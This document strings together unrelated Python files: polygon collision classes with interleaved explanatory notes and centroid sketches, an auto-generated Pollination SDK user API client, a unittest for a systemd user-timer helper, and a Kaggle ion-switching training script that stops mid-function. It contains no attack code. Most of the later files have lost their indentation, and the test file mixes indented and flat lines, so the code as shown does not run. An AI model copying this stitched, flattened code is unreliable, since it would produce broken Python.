        c = cls(center, [Vector(-hw, -hh), Vector(hw, -hh), Vector(hw, hh), Vector(-hw, hh)])
        return c

    def __setattr__(self, key, val):
        self.__dict__[key] = val
        if key in POLY_RECALC_ATTRS:
            self._recalc()

    def set_points(self, points):
        if tripy.is_clockwise(points):
            points = points[::-1]
        length_changed = len(self.base_points) != len(points) if hasattr(self, "base_points") else True
        if length_changed:
            self.rel_points = []
            self.edges = []
            self.normals = []
            for i in range(len(points)):
                self.rel_points.append(Vector(0, 0))
                self.edges.append(Vector(0, 0))
                self.normals.append(Vector(0, 0))
        self.base_points = points
        self._recalc()

    def _recalc(self):
        l = range(len(self.base_points))
        for i in l:
            self.rel_points[i].set(self.base_points[i])
            if self.angle != 0:
                self.rel_points[i] = self.rel_points[i].rotate(self.angle)
        for i in l:
            p1 = self.rel_points[i]
            p2 = self.rel_points[i + 1] if i < len(self.rel_points) - 1 else self.rel_points[0]
            e = self.edges[i] = p2 - p1
            self.normals[i] = e.perp().normalize()

    @property
    def points(self):
        pos = self.pos
        return [pos + point for point in self.rel_points]

    @property
    def aabb(self):
        points = self.points
        x_min = points[0].x
        y_min = points[0].y
        x_max = points[0].x
        y_max = points[0].y
        for point in points:
            if point.x < x_min:
                x_min = point.x
            elif point.x > x_max:
                x_max = point.x
            if point.y < y_min:
                y_min = point.y
            elif point.y > y_max:
                y_max = point.y
        return ((x_min, y_min), (x_max, y_min), (x_min, y_max), (x_max, y_max))

    def get_centroid(self):
        cx = 0
        cy = 0
        ar = 0
        for i in range(len(self.rel_points)):
            p1 = self.rel_points[i]
            p2 = self.rel_points[0] if i == len(self.rel_points) - 1 else self.rel_points[i + 1]
            a = p1.x * p2.y - p2.x * p1.y
            cx += (p1.x + p2.x) * a
            cy += (p1.y + p2.y) * a  # fixed: was (p1.x + p2.y), which breaks the shoelace centroid formula
            ar += a
        ar = ar * 3
        cx = cx / ar
        cy = cy / ar
        return Vector(cx, cy)

    def __str__(self):
        r = "Poly [\n\tpoints = [\n"
        for p in self.points:
            r += "\t\t{}\n".format(str(p))
        r += "\t]\n"
        r += "\tpos = {}\n\tangle = {}\n".format(self.pos, self.angle)
        r += "]"
        return r

    def __repr__(self):
        return self.__str__()
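`get_centroid` implements the standard shoelace (Gauss area) centroid. A standalone sketch of the same arithmetic on plain `(x, y)` tuples, useful for checking the formula outside the class (the function name is illustrative):

```python
def shoelace_centroid(points):
    """Centroid of a simple polygon given as [(x, y), ...] in CCW order."""
    cx = cy = ar = 0.0
    n = len(points)
    for i in range(n):
        x1, y1 = points[i]
        x2, y2 = points[(i + 1) % n]
        a = x1 * y2 - x2 * y1      # signed cross term of the shoelace formula
        cx += (x1 + x2) * a
        cy += (y1 + y2) * a        # note: y-coordinates in both terms
        ar += a
    ar *= 3                        # ar summed 2*area, so this gives 6*area
    return cx / ar, cy / ar


print(shoelace_centroid([(0, 0), (2, 0), (2, 2), (0, 2)]))  # (1.0, 1.0)
```

For the axis-aligned square above, the centroid is its geometric center, which makes the sign conventions easy to verify by hand.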

class Concave_Poly():
    def __init__(self, pos, points, angle=0):
        self.pos = pos
        self.__dict__["angle"] = angle
        self.set_points(points)

    def __setattr__(self, key, val):
        self.__dict__[key] = val
        if key in POLY_RECALC_ATTRS:
            self._recalc()

    def set_points(self, points):
        if tripy.is_clockwise(points):
            points = points[::-1]
        length_changed = len(self.base_points) != len(points) if hasattr(self, "base_points") else True
        if length_changed:
            self.rel_points = []
            self.tris = []
            self.edges = []
            self.normals = []
            for i in range(len(points)):
                self.rel_points.append(Vector(0, 0))
                self.edges.append(Vector(0, 0))
                self.normals.append(Vector(0, 0))
        self.base_points = points
        self._calculate_tris()
        self._recalc()

    def _recalc(self):
        l = range(len(self.base_points))
        for i in l:
            self.rel_points[i].set(self.base_points[i])
            if self.angle != 0:
                self.rel_points[i] = self.rel_points[i].rotate(self.angle)
        for i in l:
            p1 = self.rel_points[i]
            p2 = self.rel_points[i + 1] if i < len(self.rel_points) - 1 else self.rel_points[0]
            e = self.edges[i] = p2 - p1
            self.normals[i] = e.perp().normalize()
        self._update_tris()

    def _calculate_tris(self):
        self.tris = [Poly(self.pos, points, self.angle) for points in tripy.earclip(self.base_points)]

    def _update_tris(self):
        for tri in self.tris:
            tri.angle = self.angle
            tri.pos = self.pos

    @property
    def points(self):
        templist = []
        for p in self.rel_points:
            templist.append(p + self.pos)
        return templist

    @property
    def aabb(self):
        points = self.points
        x_min = points[0].x
        y_min = points[0].y
        x_max = points[0].x
        y_max = points[0].y
        for point in points:
            if point.x < x_min:
                x_min = point.x
            elif point.x > x_max:
                x_max = point.x
            if point.y < y_min:
                y_min = point.y
            elif point.y > y_max:
                y_max = point.y
        return ((x_min, y_min), (x_max, y_min), (x_min, y_max), (x_max, y_max))

    def get_centroid(self):
        cx = 0
        cy = 0
        ar = 0
        for i in range(len(self.rel_points)):
            p1 = self.rel_points[i]
            p2 = self.rel_points[0] if i == len(self.rel_points) - 1 else self.rel_points[i + 1]
            a = p1.x * p2.y - p2.x * p1.y
            cx += (p1.x + p2.x) * a
            cy += (p1.y + p2.y) * a  # fixed: was (p1.x + p2.y), which breaks the shoelace centroid formula
            ar += a
        ar = ar * 3
        cx = cx / ar
        cy = cy / ar
        return Vector(cx, cy)

    def __str__(self):
        r = "Concave_Poly [\n\tpoints = [\n"
        for p in self.points:
            r += "\t\t{}\n".format(str(p))
        r += "\t]\n"
        r += "\tpos = {}\n\tangle = {}\n".format(self.pos, self.angle)
        r += "]"
        return r

    def __repr__(self):
        return self.__str__()
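`_recalc` derives, for each edge `p2 - p1`, a unit perpendicular via `e.perp().normalize()`; these normals are the candidate separating axes used in SAT collision tests. A dependency-free sketch of that step, assuming the common `perp()` convention `(y, -x)` (plain tuples stand in for `util.Vector`):

```python
import math


def edge_normals(points):
    """Unit perpendiculars of each edge of a CCW polygon, as in _recalc."""
    normals = []
    n = len(points)
    for i in range(n):
        x1, y1 = points[i]
        x2, y2 = points[(i + 1) % n]
        ex, ey = x2 - x1, y2 - y1   # edge vector p2 - p1
        px, py = ey, -ex            # perpendicular; (y, -x) is one common perp() convention
        length = math.hypot(px, py)
        normals.append((px / length, py / length))
    return normals


# For a CCW unit square these come out as the outward face normals.
print(edge_normals([(0, 0), (1, 0), (1, 1), (0, 1)]))
```

With the `(y, -x)` convention and counter-clockwise winding the normals point outward, which is what a separating-axis test expects; a library using `(-y, x)` would simply flip their direction.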

# pollination_sdk/api/user_api.py (from pollination/python-sdk)

# coding: utf-8
"""
pollination-server
Pollination Server OpenAPI Definition # noqa: E501
The version of the OpenAPI document: 0.16.0
Contact: info@pollination.cloud
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from pollination_sdk.api_client import ApiClient
from pollination_sdk.exceptions import ( # noqa: F401
ApiTypeError,
ApiValueError
)
class UserApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_user(self, user_create, **kwargs): # noqa: E501
"""Register a new user # noqa: E501
Create a new user. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_user(user_create, async_req=True)
>>> result = thread.get()
:param user_create: (required)
:type user_create: UserCreate
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: CreatedContent
"""
kwargs['_return_http_data_only'] = True
return self.create_user_with_http_info(user_create, **kwargs) # noqa: E501
def create_user_with_http_info(self, user_create, **kwargs): # noqa: E501
"""Register a new user # noqa: E501
Create a new user. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_user_with_http_info(user_create, async_req=True)
>>> result = thread.get()
:param user_create: (required)
:type user_create: UserCreate
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(CreatedContent, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'user_create'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method create_user" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'user_create' is set
if self.api_client.client_side_validation and ('user_create' not in local_var_params or # noqa: E501
local_var_params['user_create'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `user_create` when calling `create_user`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'user_create' in local_var_params:
body_params = local_var_params['user_create']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['JWTAuth'] # noqa: E501
return self.api_client.call_api(
'/user', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CreatedContent', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def get_me(self, **kwargs): # noqa: E501
"""Get authenticated user profile. # noqa: E501
Get authenticated user profile # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_me(async_req=True)
>>> result = thread.get()
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: UserPrivate
"""
kwargs['_return_http_data_only'] = True
return self.get_me_with_http_info(**kwargs) # noqa: E501
def get_me_with_http_info(self, **kwargs): # noqa: E501
"""Get authenticated user profile. # noqa: E501
Get authenticated user profile # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_me_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
        :param _return_http_data_only: return the response data only, without
                                       the status code and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
        :param _request_auth: set to override the auth_settings for a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(UserPrivate, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_me" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyAuth', 'JWTAuth'] # noqa: E501
return self.api_client.call_api(
'/user', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UserPrivate', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def get_roles(self, **kwargs): # noqa: E501
"""Get the authenticated user roles # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_roles(async_req=True)
>>> result = thread.get()
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: list[str]
"""
kwargs['_return_http_data_only'] = True
return self.get_roles_with_http_info(**kwargs) # noqa: E501
def get_roles_with_http_info(self, **kwargs): # noqa: E501
"""Get the authenticated user roles # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_roles_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
        :param _return_http_data_only: return the response data only, without
                                       the status code and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
        :param _request_auth: set to override the auth_settings for a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(list[str], status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_roles" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyAuth', 'JWTAuth'] # noqa: E501
return self.api_client.call_api(
'/user/roles', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[str]', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def update_user_profile(self, user_update, **kwargs): # noqa: E501
"""Update the authenticated user # noqa: E501
Update the authenticated user profile # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_user_profile(user_update, async_req=True)
>>> result = thread.get()
:param user_update: (required)
:type user_update: UserUpdate
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: UpdateAccepted
"""
kwargs['_return_http_data_only'] = True
return self.update_user_profile_with_http_info(user_update, **kwargs) # noqa: E501
def update_user_profile_with_http_info(self, user_update, **kwargs): # noqa: E501
"""Update the authenticated user # noqa: E501
Update the authenticated user profile # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_user_profile_with_http_info(user_update, async_req=True)
>>> result = thread.get()
:param user_update: (required)
:type user_update: UserUpdate
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
        :param _return_http_data_only: return the response data only, without
                                       the status code and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
        :param _request_auth: set to override the auth_settings for a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(UpdateAccepted, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'user_update'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method update_user_profile" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'user_update' is set
if self.api_client.client_side_validation and ('user_update' not in local_var_params or # noqa: E501
local_var_params['user_update'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `user_update` when calling `update_user_profile`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'user_update' in local_var_params:
body_params = local_var_params['user_update']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyAuth', 'JWTAuth'] # noqa: E501
return self.api_client.call_api(
'/user', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UpdateAccepted', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))

# tests/test_systemdu.py (atareao/daily-wallpaper, MIT license)
import unittest
import os
import sys
sys.path.insert(1, 'src')
from systemdu import SystemdUser
from systemdu import USER_PATH
TEST_TIMER_FILE = 'test.timer'
TEST_SERVICE_FILE = 'test.service'
class TestSystemdUser(unittest.TestCase):
def setUp(self):
if os.path.exists(TEST_TIMER_FILE):
os.remove(TEST_TIMER_FILE)
if os.path.exists(TEST_SERVICE_FILE):
os.remove(TEST_SERVICE_FILE)
with open(TEST_TIMER_FILE, 'w') as fw:
fw.write('[Unit]\n')
fw.write('Description=Test Timer every 5 minutes\n')
fw.write('\n')
fw.write('[Timer]\n')
fw.write('OnCalendar=minutely\n')
fw.write('\n')
fw.write('[Install]\n')
fw.write('WantedBy=timers.target\n')
with open(TEST_SERVICE_FILE, 'w') as fw:
fw.write('[Unit]\n')
fw.write('Description=Test Service\n')
fw.write('\n')
fw.write('[Service]\n')
fw.write('Type=oneshot\n')
fw.write('ExecStart=echo "Test timer"\n')
def test_install(self):
systemdu = SystemdUser()
systemdu.install(TEST_TIMER_FILE)
self.assertTrue(os.path.exists(os.path.join(USER_PATH, TEST_TIMER_FILE)))
systemdu.install(TEST_SERVICE_FILE)
self.assertTrue(os.path.exists(os.path.join(USER_PATH, TEST_SERVICE_FILE)))
def test_enable(self):
        systemdu = SystemdUser()
        try:
systemdu.install(TEST_TIMER_FILE)
self.assertTrue(os.path.exists(os.path.join(USER_PATH, TEST_TIMER_FILE)))
systemdu.install(TEST_SERVICE_FILE)
self.assertTrue(os.path.exists(os.path.join(USER_PATH, TEST_SERVICE_FILE)))
systemdu.enable(TEST_TIMER_FILE)
self.assertTrue(systemdu.is_enabled(TEST_TIMER_FILE))
finally:
systemdu.disable(TEST_TIMER_FILE)
def test_start(self):
        systemdu = SystemdUser()
        try:
systemdu.install(TEST_TIMER_FILE)
systemdu.install(TEST_SERVICE_FILE)
systemdu.enable(TEST_TIMER_FILE)
systemdu.start(TEST_TIMER_FILE)
self.assertTrue(systemdu.is_active(TEST_TIMER_FILE))
finally:
systemdu.stop(TEST_TIMER_FILE)
systemdu.disable(TEST_TIMER_FILE)
def test_stop(self):
        systemdu = SystemdUser()
        try:
systemdu.install(TEST_TIMER_FILE)
systemdu.install(TEST_SERVICE_FILE)
systemdu.enable(TEST_TIMER_FILE)
systemdu.start(TEST_TIMER_FILE)
self.assertTrue(systemdu.is_active(TEST_TIMER_FILE))
systemdu.stop(TEST_TIMER_FILE)
self.assertFalse(systemdu.is_active(TEST_TIMER_FILE))
finally:
systemdu.stop(TEST_TIMER_FILE)
systemdu.disable(TEST_TIMER_FILE)
def test_disable(self):
        systemdu = SystemdUser()
        try:
systemdu.install(TEST_TIMER_FILE)
systemdu.install(TEST_SERVICE_FILE)
systemdu.enable(TEST_TIMER_FILE)
systemdu.start(TEST_TIMER_FILE)
self.assertTrue(systemdu.is_active(TEST_TIMER_FILE))
systemdu.stop(TEST_TIMER_FILE)
self.assertFalse(systemdu.is_active(TEST_TIMER_FILE))
systemdu.disable(TEST_TIMER_FILE)
self.assertFalse(systemdu.is_enabled(TEST_TIMER_FILE))
finally:
systemdu.stop(TEST_TIMER_FILE)
systemdu.disable(TEST_TIMER_FILE)
def test_uninstall(self):
        systemdu = SystemdUser()
        try:
systemdu.install(TEST_TIMER_FILE)
systemdu.install(TEST_SERVICE_FILE)
systemdu.enable(TEST_TIMER_FILE)
systemdu.start(TEST_TIMER_FILE)
self.assertTrue(systemdu.is_active(TEST_TIMER_FILE))
systemdu.stop(TEST_TIMER_FILE)
self.assertFalse(systemdu.is_active(TEST_TIMER_FILE))
systemdu.disable(TEST_TIMER_FILE)
systemdu.uninstall(TEST_TIMER_FILE)
            self.assertFalse(os.path.exists(os.path.join(USER_PATH, TEST_TIMER_FILE)))
finally:
systemdu.stop(TEST_TIMER_FILE)
systemdu.disable(TEST_TIMER_FILE)
def tearDown(self):
if os.path.exists(os.path.join(USER_PATH, TEST_TIMER_FILE)):
os.remove(os.path.join(USER_PATH, TEST_TIMER_FILE))
if os.path.exists(os.path.join(USER_PATH, TEST_SERVICE_FILE)):
os.remove(os.path.join(USER_PATH, TEST_SERVICE_FILE))
if os.path.exists(TEST_TIMER_FILE):
os.remove(TEST_TIMER_FILE)
if os.path.exists(TEST_SERVICE_FILE):
os.remove(TEST_SERVICE_FILE)
if __name__ == '__main__':
unittest.main()

# training/training.py (statsu1990/kaggle_ion_switching, MIT license)
import torch
import numpy as np
from tqdm import tqdm
from .scheduler import WarmUpLR
from .train_utils import save_log, save_checkpoint
from data import metric
class MacroF1ScoreCalculater:
def __init__(self):
self.y_true = []
self.y_pred = []
self.group = []
def add_result(self, y_true, y_pred, group):
self.time_length = y_true.shape[1]
self.y_true.append(np.ravel(y_true))
self.y_pred.append(np.ravel(y_pred))
self.group.append(np.repeat(group, y_true.shape[1]))
def calc_score(self, use_group=False):
y_true = np.concatenate(self.y_true)
y_pred = np.concatenate(self.y_pred)
group = np.concatenate(self.group)
print("All score")
score = metric.macro_f1(y_true, y_pred, group=None, print_log=True)
if use_group:
print("Group score")
scores_gr = metric.macro_f1(y_true, y_pred, group=group, print_log=True)
return score
def calc_score_region_wise(self, num_region):
y_true = np.concatenate(self.y_true)
y_pred = np.concatenate(self.y_pred)
region_idxs = (np.arange(len(y_true)) % self.time_length) // (self.time_length // num_region)
scores = []
for rg in range(num_region):
#print(np.sum(region_idxs==rg))
scores.append(metric.macro_f1(y_true[region_idxs==rg], y_pred[region_idxs==rg], group=None, print_log=False))
print([str(s)[:5] for s in scores])
return scores
def real_to_integer(value, vmin=0, vmax=10):
    return np.clip(np.round(value).astype('int'), vmin, vmax)
def trainer(net, loader, criterion, optimizer, grad_accum_steps, warmup_scheduler, use_label=False, classification=True, score_use_group=False):
net.train()
total_loss = 0
score_calclater = MacroF1ScoreCalculater()
optimizer.zero_grad()
#for batch_idx, (signals, group, open_channels, trams_mtrxs) in enumerate(tqdm(loader)):
for batch_idx, data in enumerate(tqdm(loader)):
if warmup_scheduler is not None:
warmup_scheduler.step()
if len(data) == 3:
signals, group, open_channels = data[0].cuda(), data[1].cuda(), data[2].cuda()
else:
signals, group, open_channels, trams_mtrxs = data[0].cuda(), data[1].cuda(), data[2].cuda(), data[3].cuda()
if use_label:
outputs, additional_output = net(signals, trams_mtrxs, open_channels)
loss = criterion(outputs, additional_output[0], additional_output[1], additional_output[2])
else:
if len(data) == 3:
outputs = net(signals)
else:
outputs = net(signals, trams_mtrxs)
loss = criterion(outputs, open_channels)
loss = loss / grad_accum_steps
loss.backward()
if (batch_idx + 1) % grad_accum_steps == 0:
optimizer.step()
optimizer.zero_grad()
# loss
total_loss += loss.item() * grad_accum_steps
# score
with torch.no_grad():
if classification:
score_calclater.add_result(open_channels.cpu().numpy(), outputs.max(2)[1].cpu().numpy(), group.cpu().numpy())
else:
# regression
score_calclater.add_result(open_channels.cpu().numpy(), real_to_integer(outputs.cpu().numpy()), group.cpu().numpy())
# loss
total_loss = total_loss / (batch_idx + 1)
# score
score = score_calclater.calc_score(use_group=score_use_group)
score_calclater.calc_score_region_wise(num_region=10)
print('Train Loss: %.4f | Score: %.4f' % (total_loss, score))
return total_loss, score
def tester(net, loader, criterion, classification=True, score_use_group=False):
net.eval()
total_loss = 0
score_calclater = MacroF1ScoreCalculater()
with torch.no_grad():
#for batch_idx, (signals, group, open_channels, trams_mtrxs) in enumerate(tqdm(loader)):
for batch_idx, data in enumerate(tqdm(loader)):
if len(data) == 3:
signals, group, open_channels = data[0].cuda(), data[1].cuda(), data[2].cuda()
else:
signals, group, open_channels, trams_mtrxs = data[0].cuda(), data[1].cuda(), data[2].cuda(), data[3].cuda()
if len(data) == 3:
outputs = net(signals)
else:
outputs = net(signals, trams_mtrxs)
if criterion is not None:
loss = criterion(outputs, open_channels)
# loss
total_loss += loss.item()
else:
total_loss += 0
# score
if classification:
score_calclater.add_result(open_channels.cpu().numpy(), outputs.max(2)[1].cpu().numpy(), group.cpu().numpy())
else:
# regression
score_calclater.add_result(open_channels.cpu().numpy(), real_to_integer(outputs.cpu().numpy()), group.cpu().numpy())
# loss
total_loss = total_loss / (batch_idx + 1)
# score
score = score_calclater.calc_score(use_group=score_use_group)
score_calclater.calc_score_region_wise(num_region=10)
print('Valid Loss: %.4f | Score: %.4f' % (total_loss, score))
return total_loss, score
def train_model(net, tr_loader, vl_loader, use_label,
optimizer, tr_criterion, vl_criterion,
grad_accum_steps, start_epoch, epochs,
warmup_epoch, step_scheduler, filename_head='',
classification=True):
# warmup_scheduler
if start_epoch < warmup_epoch:
warmup_scheduler = WarmUpLR(optimizer, len(tr_loader) * warmup_epoch)
else:
warmup_scheduler = None
# train
loglist = []
for epoch in range(start_epoch, epochs):
if epoch > warmup_epoch - 1:
warm_sch = None
step_scheduler.step()
else:
warm_sch = warmup_scheduler
print('\nepoch ', epoch)
for param_group in optimizer.param_groups:
print('lr ', param_group['lr'])
now_lr = param_group['lr']
score_use_group = (epoch == epochs - 1)
tr_log = trainer(net, tr_loader, tr_criterion, optimizer, grad_accum_steps, warm_sch, use_label, classification, score_use_group)
vl_log = tester(net, vl_loader, vl_criterion, classification, score_use_group)
# save checkpoint
save_checkpoint(epoch, net, optimizer, step_scheduler, filename_head + 'checkpoint')
# save log
loglist.append([epoch] + [now_lr] + list(tr_log) + list(vl_log))
        columns = ['epoch', 'lr', 'tr_loss', 'tr_score', 'vl_loss', 'vl_score']
        save_log(loglist, columns, filename_head + 'training_log.csv')
return net
def trainer_v2(net, loader, criterion, optimizer, grad_accum_steps, warmup_scheduler, use_label=False, classification=True, score_use_group=False):
net.train()
total_loss = 0
score_calclater = MacroF1ScoreCalculater()
optimizer.zero_grad()
#for batch_idx, (signals, group, open_channels, trams_mtrxs) in enumerate(tqdm(loader)):
for batch_idx, data in enumerate(tqdm(loader)):
if warmup_scheduler is not None:
warmup_scheduler.step()
if len(data) == 3:
signals, group, open_channels = data[0].cuda(), data[1].cuda(), data[2].cuda()
else:
signals, group, open_channels, trams_mtrxs = data[0].cuda(), data[1].cuda(), data[2].cuda(), data[3].cuda()
#
cor_label = torch.eq(torch.argmax(signals, dim=1), open_channels).long()
if len(data) == 3:
outputs = net(signals)
else:
outputs = net(signals, trams_mtrxs)
loss = criterion(outputs, cor_label)
loss = loss / grad_accum_steps
loss.backward()
if (batch_idx + 1) % grad_accum_steps == 0:
optimizer.step()
optimizer.zero_grad()
# loss
total_loss += loss.item() * grad_accum_steps
# score
with torch.no_grad():
sig_arg = np.argsort(signals.cpu().numpy(), axis=1)
